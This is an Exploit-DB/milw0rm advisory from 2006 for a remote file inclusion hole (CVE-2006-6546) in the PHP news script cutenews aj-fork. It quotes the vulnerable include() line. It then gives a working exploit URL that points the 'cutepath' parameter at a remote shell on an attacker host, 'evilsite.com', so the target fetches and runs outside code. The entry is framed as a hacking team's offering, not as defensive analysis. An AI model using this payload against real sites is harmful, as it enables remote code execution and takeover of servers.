cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability

EDB-ID: 2891	CVE: 2006-6546	OSVDB-ID: 32339
Author: DeltahackingTEAM	Published: 2006-12-04	Verified:
Exploit Code:	Vulnerable App: N/A

===========================================================================================================
DeltasecurityTEAM
www.Deltasecurity.ir
===========================================================================================================
* Portal Name : cutenews aj-fork
* Class = Remote File Inclusion ;
* Download =http://mesh.dl.sourceforge.net/sourceforge/ajfork/cn_aj_167.zip
* Found by = DeltahackingTEAM
* User In Delta Team (Tanha )
----------------------------------------------------------------------------------------------------------
- Vulnerable Code
--------------------
    include($cutepath.'/inc/plugins.php');
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
    http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?
----------------------------------------------------------------------------------------------------------
Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN
Sp Tnx For Dr.Pantagon For Learning Find Bug
# milw0rm.com [2006-12-04]

Comments

cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability

Rating

No comments so far